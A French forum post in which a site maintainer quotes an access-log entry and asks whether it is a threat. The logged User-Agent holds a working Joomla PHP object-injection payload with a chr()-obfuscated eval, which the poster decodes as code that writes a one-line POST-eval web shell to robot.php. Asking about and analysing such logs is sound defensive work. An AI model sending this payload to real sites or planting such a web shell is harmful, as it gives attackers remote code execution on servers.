Discussion :

[VinsS]

Salut,

En vérifiant les logs d'un site que je maintiens je trouve une série de log comme ceci:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
58.218.213.93 - - [20/Jun/2018:02:31:52 +0000] 
"GET / HTTP/1.0" 200 4235 "http://www.py3exiv2.tuxfamily.org/" 
"}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:729:\"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

La suite de caractères dans l'eval() représente: fputs(fopen($_SERVER['DOCUMENT_ROOT'].'/robot.php','w'),'<?php @eval($_POST[x])?>');

Qu'est ce que cela peut signifier, faut-il s'en inquiéter ?
Il n'existe pas de /robot.php sur mon site de toute façon.
Avec cette même IP il y a aussi une cinquantaine de requêtes HEAD, GET et POST toutes avec un 404 en retour.

Merci.